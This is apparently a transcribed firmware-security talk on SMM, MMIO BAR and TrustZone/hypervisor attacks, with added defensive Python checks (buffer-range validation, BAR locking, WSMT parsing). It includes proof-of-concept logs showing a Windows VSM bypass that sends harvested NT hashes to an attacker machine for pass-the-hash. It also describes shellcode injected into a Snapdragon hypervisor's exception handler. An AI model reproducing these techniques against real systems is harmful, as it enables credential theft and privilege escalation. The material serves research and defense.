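# Half-open [start, end) ranges the handler must never write on a caller's behalf.
SMRAM       = (0x7E000000, 0x7E800000)   # SMRAM on x86 / TrustZone memory on ARM
VMM_PAGES   = (0x0524B000, 0x0524C000)   # pages holding hypervisor structures
SECURE_MMIO = (0xFED40000, 0xFED45000)   # MMIO window of a device owned by the secure world
PROTECTED   = [SMRAM, VMM_PAGES, SECURE_MMIO]


def overlaps(start, size, rng):
    """True when [start, start+size) intersects the half-open range rng."""
    lo, hi = rng
    return start < hi and start + size > lo


def weak_check(start, protected=PROTECTED):
    """The check that is too weak: only the first byte is tested, so a buffer that
    starts just below SMRAM and extends into it passes."""
    return not any(lo <= start < hi for lo, hi in protected)


def buffer_is_safe(start, size, protected=PROTECTED, addr_bits=64):
    """Whole-range check: non-empty, no wrap past the top of the address space, and
    no intersection with SMRAM/TZ, VMM pages or secure MMIO."""
    if start < 0 or size <= 0:
        return False
    if start + size > (1 << addr_bits):       # Python ints do not wrap, so the overflow is visible
        return False
    return not any(overlaps(start, size, r) for r in protected)


class SharedMem:
    """Normal-world memory shared with the handler. `racer`, when set, runs before every
    read and stands in for another core modifying the request while the handler runs."""

    def __init__(self):
        self.words = {}
        self.racer = None

    def read(self, addr):
        if self.racer:
            self.racer(self, addr)
        return self.words.get(addr, 0)

    def write(self, addr, value):
        self.words[addr] = value


def handler_toctou(mem, req):
    """Reads the request header (buffer pointer at req, size at req+8) once to validate
    and again to use it. Returns the action the handler would take."""
    buf, size = mem.read(req), mem.read(req + 8)
    if not buffer_is_safe(buf, size):
        return ("rejected",)
    buf, size = mem.read(req), mem.read(req + 8)     # second read: the race window
    return ("write", buf, size)


def handler_snapshot(mem, req):
    """Copies the header into handler-private storage once and uses only that copy."""
    hdr = (mem.read(req), mem.read(req + 8))
    if not buffer_is_safe(*hdr):
        return ("rejected",)
    return ("write",) + hdr


def run_race(handler, req=0x1000, benign_buf=0x2000, size=0x100):
    """Drive `handler` against a racer that repoints the buffer into SMRAM right after
    the validating pair of reads (the third read the handler performs)."""
    mem = SharedMem()
    mem.write(req, benign_buf)
    mem.write(req + 8, size)
    count = {"reads": 0}

    def racer(m, addr):
        count["reads"] += 1
        if count["reads"] == 3:
            m.write(req, SMRAM[0])

    mem.racer = racer
    return handler(mem, req)


if __name__ == "__main__":
    print("first-byte check accepts straddling buffer:", weak_check(SMRAM[0] - 0x10))
    print("range check accepts it:", buffer_is_safe(SMRAM[0] - 0x10, 0x100))
    print("re-reading handler ends up writing to:", run_race(handler_toctou))
    print("snapshotting handler writes to:", run_race(handler_snapshot))
```

The re-reading handler passes validation and then writes at `SMRAM[0]`; the snapshotting handler writes to the buffer it validated. The same `buffer_is_safe` rejects a buffer that straddles the bottom of SMRAM, one that wraps the address space, and one that lands in the secure device's MMIO window.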

#### **Unchecked MMIO Pointer Fuzzer for TZ**





#### Pointer overlap vulnerability

## Firmware use of MMIO



#### **MMIO BAR Issue**

An exploit with PCI config access can modify a BAR register and relocate the device's MMIO range

On an SMI, the SMI handler in firmware attempts to communicate with the device(s)

It may then read or write "registers" within the relocated MMIO range



# **Overlapping SoC Ranges with TrustZone Memory**

- MMIO and core registers may contain addresses to SoC or core ranges/structures
- Example: Debug Buffer, TTBR...
- Overlap range/structure with TrustZone memory and look for unexpected behavior
- Hardware should properly handle overlap condition
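For the MMIO BAR issue, a handler that reads the BAR from PCI config space at SMI time trusts a register the OS can rewrite. The model below is an added example with constructed addresses, not code from the talk: it records BAR values while firmware still owns the platform and, at SMI time, refuses a base that has moved, lies outside the platform's MMIO window, or overlaps protected memory, which is the same overlap condition the TrustZone bullets above expect hardware to handle.

```python
"""Guarding SMI-time MMIO access against a relocated BAR.

Added example, not code from the talk. All addresses are constructed.
"""

PROTECTED = [(0x7E000000, 0x7E800000)]     # SMRAM / TrustZone memory (constructed)
MMIO_WINDOW = (0xC0000000, 0xFF000000)      # where this platform places device MMIO (constructed)


class FakePciConfig:
    """Stand-in for PCI config space. BARs are writable by whoever has config access,
    which is exactly the problem."""

    def __init__(self, bars):
        self.bars = dict(bars)      # (bus, dev, fn, bar_index) -> base address

    def read_bar(self, key):
        return self.bars[key]

    def write_bar(self, key, base):
        self.bars[key] = base


class SmiMmioPolicy:
    """Records BAR values while firmware still owns the platform and, at SMI time,
    refuses an MMIO base that differs from the recording, lies outside the platform
    MMIO window, or overlaps protected memory."""

    def __init__(self, pci, protected=PROTECTED, window=MMIO_WINDOW):
        self.pci, self.protected, self.window = pci, protected, window
        self.locked = {}

    def lock_at_boot(self, key):
        """Call before handing control to the OS (e.g. before the SMRAM lock)."""
        self.locked[key] = self.pci.read_bar(key)

    def mmio_base_for_smi(self, key, size):
        """Returns (current BAR, list of reasons to refuse); an empty list means usable."""
        current = self.pci.read_bar(key)        # what a naive handler would use unchecked
        reasons = []
        if key not in self.locked or current != self.locked[key]:
            reasons.append("BAR changed since boot")
        if not (self.window[0] <= current and current + size <= self.window[1]):
            reasons.append("outside MMIO window")
        if any(current < hi and current + size > lo for lo, hi in self.protected):
            reasons.append("overlaps protected memory")
        return current, reasons


def demo(size=0x1000):
    """Lock a BAR at boot, then relocate it into SMRAM the way an OS-level exploit with
    PCI config access would, and show what the SMI-time check reports in each case."""
    key = (0, 0x1F, 0, 0)                        # constructed bus/device/function/BAR index
    pci = FakePciConfig({key: 0xFED00000})
    policy = SmiMmioPolicy(pci)
    policy.lock_at_boot(key)
    before = policy.mmio_base_for_smi(key, size)
    pci.write_bar(key, 0x7E3FF000)               # BAR now points into SMRAM
    after = policy.mmio_base_for_smi(key, size)
    return before, after


if __name__ == "__main__":
    print(demo())
```

Before relocation the check returns no reasons; after it, all three fire, so an SMI handler built on this policy would refuse to touch the "device" instead of writing into SMRAM.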



#### Virtualization Based Security

#### Windows 10 Virtualization Based Security (VBS)



#### **Example: bypassing Windows 10 VSM**

```
[*] running loaded modules ..
[*] running module: chipsec.modules.poc.vsm
[*] Module path: C:\chipsec\chipsec\modules\poc\vsm.pyc
[x][ =======================================================================
[x][ Module: Windows 10 Virtualization Based Security Bypass
[x][ =======================================================================
[*] Searching for (U)EFI system firmware S3 boot script in physical memory
[+] Found firmware S3 boot script at 0x000000087C65000
[!] The S3 boot script has been modified. Go to sleep..
    Hypervisor and secure VM memory will be exposed after resume

C:\chipsec>chipsec_main.py -m poc.vm_find -a demo
################################################################
##                                                            ##
##  CHIPSEC: Platform Hardware Security Assessment Framework  ##
##                                                            ##
################################################################
[CHIPSEC] Version 1.2.1
[CHIPSEC] Arguments: -m poc.vm_find -a demo
WARNING: *******************************************************
WARNING: It should not be installed/deployed on production end-user systems.
WARNING: See WARNING.txt
WARNING: *******************************************************
[CHIPSEC] Platform: Desktop 4th Generation Core Processor (Haswell CPU / Lynx Point PCH)
[CHIPSEC]      VID: 8086
[CHIPSEC]      DID: 0C00
[+] loaded chipsec.modules.poc.vm_find
[*] running loaded modules ..
[*] running module: chipsec.modules.poc.vm_find
[*] Module path: C:\chipsec\chipsec\modules\poc\vm_find.pyc
[*] Module arguments (1):
    ['demo']
[x][ =======================================================================
[x][ Module: Virtual Machines Analyser
[x][ =======================================================================
[*] Searching VM VMCS
[*] Found Virtual Machine with Extended Page Tables Address: 000000000524B01E
[*] Reading Extended Page Tables at 0x000000000524B01E
    size: 544 KB, address space: 3019 MB
[*] Creating Reverse Translation
[*] Found Virtual Machine with Extended Page Tables Address: 000000004E40301E
[*] Reading Extended Page Tables at 0x000000004E40301E
    size: 60 KB, address space: 203 MB
[*] Creating Reverse Translation
[*] Searching NT Hash in memory
[*] Found 63 candidates, sending them to attacker machine
[*] Found 1 candidates, sending them to attacker machine
```

Attacker VM window (ubuntu-attacker on DEMOPC): Impacket tries each received candidate NT hash with pass-the-hash; the attempts fail with STATUS_LOGON_FAILURE until one succeeds, after which the session lists the target's shares (ADMIN$, C$, IPC$, NETLOGON, share, SYSVOL) and reads confidential.txt from the share.

## Windows SMM Security Mitigations Table (WSMT)

The Windows SMM Security Mitigations Table (WSMT) specification contains details of an Advanced Configuration and Power Interface (ACPI) table that was created for use with Windows operating systems that support Windows virtualization-based security (VBS) features.

This information applies to the following operating systems:

- Windows Server 2016
- Windows 10, version 1607
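WSMT is a small table: a standard ACPI header followed by one 32-bit field of protection flags that tell the OS which SMM mitigations the firmware claims to implement (fixed communication buffers, validation of nested pointers inside communication buffers, and no reconfiguration of system resources from SMM, which map directly onto the SMM pointer and MMIO issues discussed above). The parser below is an added example, not from the talk or from chipsec; the layout and flag names follow Microsoft's published WSMT specification, which this page does not reproduce, and the sample table is constructed in the code.

```python
"""Parse and sanity-check a WSMT ACPI table.

Added example, not code from the talk or from chipsec. Layout per Microsoft's WSMT
specification: 36-byte ACPI table header, then a 32-bit Protection Flags field.
"""
import struct

# Signature, Length, Revision, Checksum, OEMID, OEM Table ID, OEM Revision, Creator ID, Creator Revision
HEADER_FMT = "<4sIBB6s8sI4sI"
HEADER_LEN = struct.calcsize(HEADER_FMT)      # 36

FLAGS = {
    1 << 0: "FIXED_COMM_BUFFERS",                 # SMM only accepts comm buffers in fixed, pre-agreed ranges
    1 << 1: "COMM_BUFFER_NESTED_PTR_PROTECTION",  # pointers found inside comm buffers are validated
    1 << 2: "SYSTEM_RESOURCE_PROTECTION",         # SMM does not reconfigure system resources (e.g. MMIO BARs, IOMMU)
}


def acpi_checksum_ok(table):
    """ACPI tables are valid when all bytes, checksum byte included, sum to 0 mod 256."""
    return sum(table) % 256 == 0


def parse_wsmt(table):
    """Decode a WSMT table. Never raises: structural problems are collected in 'errors'
    so a platform checker can report them next to the missing mitigations."""
    result = {"errors": [], "present": [], "missing": [], "flags": None, "oem_id": None}
    if len(table) < HEADER_LEN + 4:
        result["errors"].append("table too short")
        return result
    sig, length, rev, _csum, oem_id, _oem_tid, _oem_rev, _cid, _crev = struct.unpack_from(HEADER_FMT, table, 0)
    if sig != b"WSMT":
        result["errors"].append("bad signature %r" % sig)
    if length != len(table):
        result["errors"].append("length field %d != %d bytes" % (length, len(table)))
    if not acpi_checksum_ok(table):
        result["errors"].append("checksum mismatch")
    flags, = struct.unpack_from("<I", table, HEADER_LEN)
    result.update(
        revision=rev,
        oem_id=oem_id.decode("ascii", "replace").strip(),
        flags=flags,
        present=[name for bit, name in FLAGS.items() if flags & bit],
        missing=[name for bit, name in FLAGS.items() if not flags & bit],
    )
    return result


def build_wsmt(flags, oem_id=b"DEMO  ", oem_table_id=b"DEMOWSMT"):
    """Construct a well-formed WSMT table with the given flags (sample data, not from any vendor)."""
    body = struct.pack("<I", flags)
    header = struct.pack(HEADER_FMT, b"WSMT", HEADER_LEN + len(body), 1, 0,
                         oem_id, oem_table_id, 1, b"DEMO", 1)
    table = bytearray(header + body)
    table[9] = (-sum(table)) & 0xFF          # checksum byte at offset 9 makes the sum 0 mod 256
    return bytes(table)


if __name__ == "__main__":
    sample = build_wsmt(0b011)               # claims the two comm-buffer mitigations only
    print(parse_wsmt(sample))
```

On a real system the bytes would come from the ACPI table the OS exposes (for example `/sys/firmware/acpi/tables/WSMT` on Linux); a missing table or an empty `present` list means Windows cannot assume any of these SMM mitigations, and a checksum or length error means the table should not be trusted at all.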

# **SMC Argument Pointing to Hypervisor**





#### Modifying Hypervisor on Snapdragon 808...

- We find hypervisor binary in memory. Must be a copy?
- Let's try to modify it. The phone reboots! WTF?
- Assumption: stage 2 translation is disabled?

```
root@bullhead:/sdcard/t3 # python chipsec_util.py mem read 0x6C00000
################################################################
##  CHIPSEC: Platform Hardware Security Assessment Framework  ##
################################################################
[CHIPSEC] Version 1.2.2
****** Chipsec Linux Kernel module is licensed under GPL 2.0
[CHIPSEC] Executing command 'mem' with args ['read', '0x6C00000']
[CHIPSEC] reading buffer from memory: PA = 0x0000000006C00000, len = 0x100..
44 11 00 58 04 c0 1c d5 20 40 1c d5 a3 00 3c d5
64 1c 78 92 63 1c 40 92 63 18 44 aa a4 10 00 58
00 00 82 d2 00 7c 03 9b 9f 60 20 cb f4 4f bf a9
f3 03 03 aa e2 07 bf a9 a0 00 3c d5 02 1c 78 92
00 1c 40 92 00 18 42 aa d1 03 00 94 a0 00 3c d5
f7 0b 00 94 1f 00 00 f1 e0 01 00 54 20 40 ..
a0 00 3c d5 01 1c 78 92 00 1c 40 92 00 18 41 aa
01 00 80 d2 79 0e 00 94 a0 00 3c d5 20 0c 00 94
1f 00 00 f1 80 00 00 54 e1 03 00 aa e2 7f c1 a8
02 00 00 14 e2 07 c1 a8 f4 03 02 aa 60 00 80 d2
00 e1 1c d5 e0 03 1f aa 60 e0 1c d5 60 11 1c d5
e0 7f 86 d2 40 11 1c d5 3f 04 00 f1 c0 00 ..
3f 08 00 f1 40 00 00 54 00 00 00 14 04 ..
05 00 00 14 00 10 38 d5 00 00 7b b2 00 10 18 d5
e4 03 1f aa 04 11 1c d5 9f 00 61 f2 01 01 00 54
20 40 3c d5 1f 00 40 f2 61 00 00 54 60 12 80 d2
[CHIPSEC] (mem) time elapsed 0.014

root@bullhead:/sdcard/t3 # python chipsec_util.py mem writeval 0x6C00000 dword 0xFFFFFFFF
[CHIPSEC] Executing command 'mem' with args ['writeval', '0x6C00000', 'dword', '0xFFFFFFFF']
[CHIPSEC] writing 4-byte value 0xFFFFFFFF to PA 0x000000006C00000..
[CHIPSEC] (mem) time elapsed 0.001

root@bullhead:/sdcard/t3 # python chipsec_util.py mem read 0x6C00000
[CHIPSEC] Executing command 'mem' with args ['read', '0x6C00000']
[CHIPSEC] reading buffer from memory: PA = 0x000000006C00000, len = 0x100..
ff ff ff ff 04 c0 1c d5 20 40 1c d5 a3 00 3c d5
64 1c 78 92 63 1c 40 92 63 18 44 aa a4 10 00 58
00 00 82 d2 00 7c 03 9b 9f 60 20 cb f4 4f bf a9
f3 03 03 aa e2 07 bf a9 a0 00 3c d5 02 1c 78 92
00 1c 40 92 00 18 42 aa d1 03 00 94 a0 00 3c d5
root@bullhead:/sdcard/t3 #
```

#### Now we can patch the hypervisor...



#### **Patching EL2 Vector Table**



#### **PoC Exploit App and Hypervisor Patch**

- The exploit app stores a magic number and a command in memory
- The hypervisor rootkit reads the magic number and executes the command
- For example, the command "Expose EL1 kernel memory at address X"

#### **Exploit Details**

```
bullhead:/ # /su/expl.sh
chipsec 6843 0
[CHIPSEC] OS      : Linux 3.10.73-gb1bd207-dirty #1 SMP PREEMPT Mon Jun 26 16:11:07 PDT
[CHIPSEC] Platform: aarch64

[+] loaded chipsec.modules.tools.hyp.hyp_exploit

[*] running module: chipsec.modules.tools.hyp.hyp_exploit
[x][ Module: Patching the hypervisor
[Exploit] Check Hypervisor memory at address : 0x06C00000
44 11 00 58 04 c0 1c d5 20 40 1c d5 a3 00 3c d5  | D X @ <
64 1c 78 92 63 1c 40 92 63 18 44 aa a4 10 00 58  | d x c @ c D X
[Exploit] EL1 kernel module has access to Hypervisor memory
[Exploit] Read VBAR_EL2 with address of Hyp Vector Table : 0x06C08800
[Exploit] Find a Exception Handler function in which exploit will inject Shellcode
[Exploit] Target Function Address : 0x06C017FC
[Exploit] Prepare Shellcode with Commands : Read/Write EL1 Kernel memory

[Exploit] Inject Shellcode to Target Function in address : 0x06C019F8
[Exploit] Check Shellcode after injection : PASS
```

#### **Exploit Details**

Terminal capture (ASCII column omitted; some rows are only partially legible):

```
bullhead:/ # /su/chipsec_util.sh mem read 0x80000
chipsec 6843 0
10 00 00 14 00 00 00 00 00 00 08 00 00 00 00 00
(two rows not legible in the capture)
00 00 00 00 00 00 00 00 41 52 4d 64 00 00 00 00     ........ARMd....
f5 03 00 aa ef ff 05 94 71 00 06 94 15 00 06 94
16 00 38 d5 e0 03 16 aa 7a 00 06 94 f7 03 00 aa
17 01 00 b4 20 00 00 94 47 00 00 94 3b 05 00 58
9e 02 00 10 ec 0a 40 f9 8c 01 1c 8b 80 01 1f d6
1f 20 03 d5 ff ff ff 17 1f 20 03 d5 1f 20 03 d5
(further rows of 1f 20 03 d5 padding, count not legible)
c5 10 00 58 05 c0 18 d5 19 20 18 d5 3a 20 18 d5
df 3f 03 d5 01 00 00 14 00 10 18 d5 df 3f 03 d5
60 03 1f d6 bf 0a 40 f2 01 01 00 54 bf 02 18 eb
cb 00 00 54 00 00 a4 d2 00 00 18 8b bf 02 00 eb
[CHIPSEC] (mem) time elapsed 0.003
```

Output of the exploit app (dump rows reflowed from the capture; the leading rows are not legible):

```
bullhead:/ #
[APP] Got signal from the Hypervisor!
[APP] Hooked interrupt executed
[APP] Address in Android kernel to read through
[APP] hooked Hypervisor interrupt is: 0x80000
[APP] Kernel Memory Dump:
00 00 00 00 00 00 00 00 41 52 4D 64 00 00 00 00
F5 03 00 AA EF FF 05 94 71 00 06 94 15 00 06 94
16 00 38 D5 E0 03 16 AA 7A 00 06 94 F7 03 00 AA
17 01 00 B4 20 00 00 94 47 00 00 94 3B 05 00 58
9E 02 00 10 EC 0A 40 F9 8C 01 1C 8B 80 01 1F D6
1F 20 03 D5 FF FF FF 17 1F 20 03 D5 ..
C5 10 00 58 05 C0 18 D5 19 20 18 D5 3A 20 18 D5
DF 3F 03 D5 01 00 00 14 00 10 18 D5 DF 3F 03 D5
60 03 1F D6 BF 0A 40 F2 01 01 00 54 BF 02 18 EB
CB 00 00 54 00 00 A4 D2 00 00 18 8B BF 02 00 EB
```

A user-mode application can read EL2 kernel memory from physical address 0x80000 using our hyp patch

#### This has been fixed in Google Pixel

- The trust model has changed on the Snapdragon 821 SoC
- EL1 (kernel) is no longer in the TCB of EL2 (hypervisor)
- The hypervisor is no longer accessible from the Android kernel (EL1)

```
user@kli:~$ adb shell
python chipsec_util.py mem read 0x85810000
################################################################
##                                                            ##
##  CHIPSEC: Platform Hardware Security Assessment Framework  ##
##                                                            ##
################################################################
[CHIPSEC] Version 1.2.2
****** Chipsec Linux Kernel module is licensed under GPL 2.0
[CHIPSEC] Executing command 'mem' with args ['read', '0x85810000']
[CHIPSEC] reading buffer from memory: PA = 0x0000000085810000, len = 0x100..
```

#### **Cannot use SMC handler either**

- Passing a hypervisor address in the SMC argument
- Returns an error result
- SMC does not allow overwriting hypervisor memory on behalf of EL1

#### Conclusion

- Increase awareness of the architecture and of unpatched vulnerabilities
- Software should use the hardware properly in order to avoid integration bugs
- Many vendors have not patched systems for known firmware vulnerabilities
- Similarities between attack vectors on x86 and ARM exist, and the security architectures can learn from each other

#### Thank You!